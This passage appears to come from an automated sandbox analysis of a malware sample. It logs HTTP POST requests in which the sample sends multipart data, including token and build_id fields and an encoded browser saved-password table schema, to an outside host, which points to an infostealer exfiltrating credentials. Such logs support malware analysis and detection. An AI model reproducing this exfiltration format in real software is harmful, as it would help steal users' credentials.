                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 53 52 49 57 4c 4e 59 43 42 49 45 55 41 41 49 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------CBASRIWLNYCBIEUAAI5FContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------CBASRIWLNYCBIEUAAI5FContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------CBASRIWLNYCBIEUAAI5FCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        13192.168.2.549770188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:27 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----6FU3EKF37QIE37Y5FUS0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 55081
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------6FU3EKF37QIE37Y5FUS0Content-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------6FU3EKF37QIE37Y5FUS0Content-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------6FU3EKF37QIE37Y5FUS0Cont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:27 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:27 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        14192.168.2.549776188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----US0R9RI58YM7YMGLX4W4
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 142457
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------US0R9RI58YM7YMGLX4W4Content-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------US0R9RI58YM7YMGLX4W4Content-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------US0R9RI58YM7YMGLX4W4Cont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
